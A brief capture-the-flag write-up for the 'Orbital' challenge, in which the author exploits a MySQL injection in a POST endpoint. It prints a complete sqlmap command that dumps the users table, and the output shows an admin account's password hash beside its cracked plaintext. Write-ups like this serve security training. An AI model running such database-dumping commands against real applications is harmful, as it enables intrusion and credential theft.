Orbital

Personal Rating: Easy

We have a website where we can send a POST request to an endpoint. The input is used in MySQL SQL commands. You should have found the proper SQL injection command manually, but I must admit that I used sqlmap. Shame on me.

sqlmap -r HTB-CTF-2023/Orbital/orbitalrequest --level 5 --risk 2 --dbms=mysql -D orbital -T users --dump

+----+-------------------------------------------------+----------+
| id | password                                        | username |
+----+-------------------------------------------------+----------+
| 1  | 1692b753c031f2905b89e7258dbc49bb (ichliebedich) | admin    |
+----+-------------------------------------------------+----------+
PreviousNeedle in the HaystackNextPacket Cyclone

Last updated